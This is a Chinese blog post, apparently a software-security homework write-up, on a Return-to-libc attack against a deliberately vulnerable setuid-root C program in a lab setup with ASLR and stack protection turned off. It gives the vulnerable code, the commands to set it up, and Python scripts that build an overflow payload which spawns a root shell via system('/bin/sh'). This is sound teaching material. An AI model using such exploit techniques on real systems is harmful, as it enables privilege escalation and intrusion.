使用Return2LibC利用栈溢出漏洞

最新推荐文章于 2023-06-03 01:18:30 发布
最新推荐文章于 2023-06-03 01:18:30 发布
阅读量765 收藏 6
点赞数 1
分类专栏: 软件安全 文章标签: 安全 linux ubuntu c语言 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44338712/article/details/115632010
版权

使用Return2LibC利用栈溢出漏洞

环境:ubuntu16.04, gcc, gdb,

说明:为了成功实现Return2LibC攻击,这里关闭了可执行栈、关闭了StackGuard、关闭了地址随机化,终极目标是执行 system("/bin/sh")

1. 存在栈溢出漏洞的程序

如下就是我们的测试代码homework2.c,使用strcpy函数,但却没有判断字符串长度,存在栈溢出漏洞。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int vulfunc(char *str)
{
    char buffer[25];
    strcpy(buffer, str);
    return 1;
}
int main(){
    char str[500];
    FILE *badfile;
    badfile = fopen("badfile","r");
    fread(str, sizeof(char), 400, badfile);
    vulfunc(str);
    printf("Returned properly\n");
    fclose(badfile);
    return 0;
}

然后编译上述代码,关闭可执行栈、关闭StackGuard、关闭地址随机化

gcc -fno-stack-protector -z noexecstack -g -o homework2 homework2.c

cDVbDA.png

然后关闭地址随机化

sudo sysctl -w kernel.randomize_va_space=0

cDZpvQ.png

然后修改文件拥有者和文件属性,文件拥有者修改为root,文件属性设置为4755:① 文件所有者可读可写可执行;② 与文件所有者同属一个用户组的其他用户可读可执行;③ 其它用户组可读可执行;④ 其他用户执行文件时,具有与所有者相当的权限。

sudo chown root homework2  
sudo chmod 4755 homework2

cDZZCT.png

2. 准备Return2LibC攻击所需地址信息

首先需要找到两个libc函数,system和exit(system用于执行我们的恶意指令,exit用于正确退出程序),使用gdb调试程序,然后打印处这两个函数的地址,如下图所示,system函数位于0xb7e43da0,exit函数位于0xb7e379d0

cDZWrj.png

然后我们还需要找一个"/bin/sh"字符串,这就有很多方法(直接暴力搜索内存或者环境变量等等),这里使用环境变量。

我们使用如下程序获得环境变量地址

#include<stdio.h>
int main(){
    char * shell = (char *)getenv("MYSHELL");
    if(shell){
        printf("  Value:   %s\n", shell);
        printf("  Address: %x\n", (unsigned int) shell);
    }
    return 1;
}

创建一个环境变量,并执行上述程序,可以看到地址为0xbffffe68,在我们运行homework2程序时可能并不是这个地址(可能和程序名称长度等等因素有关)

cDe1yQ.png

使用gdb调试测试程序,然后查看栈中内容,就能找到我们的环境变量,地址为0xbffffe58,这才是我们需要的地址。

x /500s $esp

cDeRfK.png

然后我们还需要找到需要覆盖的ret的位置(eip),我们向缓冲区覆盖连续的字节。然后查看eip的值即可,脚本如下:

import sys

# fill content with none zero values
content = bytearray(0x01 for i in range(100));

for i in range(100):
	content[i] += i

badfile = open("badfile", "wb")
badfile.write(content)
badfile.close()

可以看到eip的低字节为0x26=38,也就是需要在缓冲第38个字节开始覆盖system地址

cysEZD.png

3. 进行Return2LibC攻击

在函数调用过程中栈空间如下图所示

cDmE1U.png

我们使用缓冲区溢出漏洞,使用buffer变量覆盖栈空间,将返回地址填充为system函数,进入system函数后,其返回地址填充为exit函数地址,这样程序就能正常结束,再往上就填充system传入参数即可(即“/bin/sh”)

cDmJje.png

然后我们结合上述得到的地址信息,使用如下脚本就能得到恶意输入badfile

import sys

# fill content with none zero values
content = bytearray(0xaa for i in range(300))
# for i in range(100):
    # content[i] += i

# address of "/bin/sh"
a3 = 0xbffffe58
# write to ebp+12
content[45:49] = (a3).to_bytes(4, byteorder='little')

# address of exit
a2 = 0xb7e379d0
# write to ebp+8
content[41:45] = (a2).to_bytes(4, byteorder='little')

# address of system
a1 = 0xb7e43da0
# write to ebp+4
content[37:41] = (a1).to_bytes(4, byteorder='little')

badfile = open("badfile", "wb")
badfile.write(content)
badfile.close()

得到的badfile如下

cDmogU.png

然后我们使用gdb调试homework2程序,start开始程序(在main函数停下),然后c运行,可以看到我们成功运行了system(“./bin/sh”),得到了一个shell

cDmHu4.png

大功告成🙂

panfengblog
关注
专栏目录
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
3. **Blind Return-Oriented Programming (BROP)**:在没有目标二进制文件的情况下,通过已知的溢出漏洞和程序行为进行攻击。 每个方法都有其特定的使用场景和挑战,例如,SROP和BROP在某些情况下可能更为有效,...
栈溢出至getshell分析及利用
最新发布
zkaqlaoniao的博客
10-07 256
以下使用一个在程序作为例题进行分析。
栈溢出学习(二)Return2Libc
毒饺子的博客
10-24 1049
跟随教程https://sploitfun.wordpress.com/2015/ 此次实验参考https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ 又看到一个好的博客,也是栈溢出系列:https://www.ret2rop.com/2018/08/return-to-libc.html NX保护机制 ​ NX保护机制原则为可写与可执行互斥,这就导致我们之前在栈上的shellcode不可以被执行,因
return2libc学习笔记
omnispace的博客
03-29 4742
0x00 背景介绍 author:万抽抽 r2libc技术是一种缓冲区溢出利用技术,主要用于克服常规缓冲区溢出漏洞利用技术中面临的no stack executable限制(所以后续实验还是需要关闭系统的ASLR,以及堆栈保护),比如PaX和ExecShield安全策略。该技术主要是通过覆盖栈帧中保存的函数返回地址(eip),让其定位到libc库中的某个库函数(如,system等),而不是
栈溢出Return2libc
Yannie's Blog
12-09 1061
参考文章:https://zhuanlan.zhihu.com/p/25816426 我们利用函数调用来实现攻击,核心目的是用攻击指令的地址来覆盖返回地址 通常用的有以下四种方法: 修改返回地址,让其指向溢出数据中的一段指令(shellcode) 修改返回地址,让其指向内存中已有的某个函数(return2libc) 修改返回地址,让其指向内存中已有的一段指令(ROP) 修改某个被调用函数的地址,让...
栈溢出学习(二)之 jmp esp & return2libc
Pz_mstr's Blog
03-22 3256
前言 栈溢出学习(二),针对一个例子,进行各种栈溢出技术的练习。本文内容承接栈溢出学习(一) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * gcc -...
Lab2-Return-To-Libc
11-10
Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序库函数(如libc)中的现有代码来执行攻击者想要的操作。这种方法的优势在于,即使在DEP开启的情况下,由于系统函数通常...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
在这个场景中,我们关注的是在一个开启NX(No eXecute,防止栈上数据被执行)但未开启ASLR(Address Space Layout Randomization,地址空间布局随机化)的环境中如何利用栈溢出漏洞。NX技术使得栈上的数据无法直接...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
然后,攻击者可以通过向该函数发送特定的输入来触发堆栈溢出,并利用ret2libc技术来执行任意命令。 ##### 4. **技术细节** - **步骤1:** 使用工具如`ROPgadget`来找到目标程序中的ROP小工具(Return-Oriented ...
栈溢出 (1).pdf
09-30
这种情况下,攻击者可能会采用其他方法,例如“return to libc”攻击,利用程序中已经加载的、可执行的代码来进行攻击,或者使用ROP(Return-Oriented Programming)技术,通过一系列栈上已经存在的、以返回指令结尾...
ret2libc类型题目思考-ret2libc2
qq_30528603的博客
06-03 297
解析一下这样的布局,因为是栈溢出,所以我们要在溢出点做手脚填充112个字节的a来覆盖到返回地址,如何计算的填充数据的大小在ret2libc1中有很详细的讲解,这里就不再赘述,接下来,我们需要想先调用gets函数来让把我们输入的字符放入buf2,那么我们就需要调用gets函数的同时,把buf2的地址当参数传给gets函数。那么又有人问,中间的pop ebx的作用又是什么呢,其实它的作用是为了堆栈平衡的,用来把用完的buf2给弹出堆栈,方便ret的时候能正确指向system函数。因此我们完整的利用链就完成了。
栈溢出漏洞栈溢出攻击
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
[超详细]栈溢出漏洞原理实例讲解
热门推荐
Breeze的博客
05-03 2万+
[超详细]通过实例讲解栈溢出漏洞 文章目录[超详细]通过实例讲解栈溢出漏洞代码简介分析程序整体执行流程程序执行细节及栈空间变化栈溢出通过栈溢出控制程序执行结果通过栈溢出插入代码 本篇文章通过《0day安全:软件漏洞分析技术》书中第二章中所用到的一个程序的栈溢出漏洞的复现,以及使用OD一步步调试来学习栈溢出完整的原理。程序虽然简单,但在一些基础薄弱的人眼中还是无法理解,所以导致很多新手到了这里就被“...
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1151
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
软件安全实验——lab9(缓冲区溢出return-to-libc绕过非可执行堆栈)
Onlyone_1314的博客
08-11 1360
目录标题1、实验室概况2、实验室任务2.1初始设置2.2脆弱程序2.3任务1:利用漏洞(1) 编译程序(2)找到“\bin\sh”的地址(3)查找libc函数的地址:(4)确定输入和bof函数的返回地址的距离(5)攻击代码(6)攻击Task 1附加任务(1)pop %esp(2)按照下图构造地址序列:(3)/bin/sh和/usr/bin/的地址(4)system函数和setuid函数的地址(5)确定输入和bof函数的返回地址的距离(6)修改buf数组大小(7)在Bof函数返回的地址设断点(8)攻击3、指导
Return to Libc Attack
大草的博客
05-19 1749
我们利用缓冲区漏洞,将恶意代码shellcode附加在缓冲区的后面。通过覆盖返回地址,跳转到恶意代码,执行栈中的shellcode代码。但是,现在的操作系统已经作出防御,禁止栈中的数据作为代码执行。但是这个并没有关系,我们可以不在栈中执行程序,我们可以通过覆盖返回地址,执行已经在内存中存在的程序,比如说libc中的system函数。我们希望跳转之后,可以执行system("/bin/sh")。这个做法的难点是,在哪里放置"/bin/sh"的地址,作为system的参数。
漏洞分析上学期期末考试题(自用,记录)
weixin_48392428的博客
06-27 2443
漏洞分析上学期期末考试题Question 1: 缓冲区溢出1Question 2: 格式化字符串Question 3: 缓冲区溢出2Question 4: Return-to-libc问题源代码 Question 1: 缓冲区溢出1 Step 1: 在root下解压final.tar.gz文件 Step 2: 关闭地址随机化 Step 3: 查看q1是否为set-UID程序 Step 4: 尝试运行q1, 并查看q1.c内容 Step 5: 把shellcode放进环境变量MYSH Step 6:
华科信息系统安全作业2:ROP与Return2Libc攻击
weixin_46237311的博客
04-14 817
华科信息系统安全作业2:ROP与Return2Libc攻击作业要求1. ROP1.1 安装ROPgadget1.2 环境1.3 EIP与buffer的距离1.4 badfile & Attack2. Return2libc环境配置Task A :查找system()的地址Task B :查找 “/bin/sh” 字符串的地址Task C : 为system()构造参数,在堆栈中查找位置以放置“/bin/sh” 地址(system()的参数) 作业要求 homework2.c有缓冲区溢出漏洞利用re
return-to-libc攻击
qq_39249347的博客
07-07 3132
栈的主要目的用来存储数据,很少需要在栈中运行代码,因此,大多数程序不需要可执行的程序栈,在一些体系架构中(包括x86),可以在硬件程序面上将一段内存区域标记为不可执行。 在Ubuntu系统中,如果使用gcc编译程序,可以让gcc生成一个特殊的二进制文件,这个二进制文件头部有一个比特位,表示是否将栈设置为不可执行,当程序被加载执行时,操作系统首先为程序分配内存,然后检查该比特位,如果它被置位,那么栈的内存区域将被标记为不可执行。#include <string.h> const char cod.
栈溢出原理与防护:深入理解与利用策略
CTF)中,常见的栈溢出利用策略包括首次触发漏洞时通过ROP泄漏 libc 的地址(如puts_got),然后计算 system 函数地址,再回到可以再次触发漏洞的位置(如 main 函数),最后使用ROP执行系统调用(如system(“/bin/...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值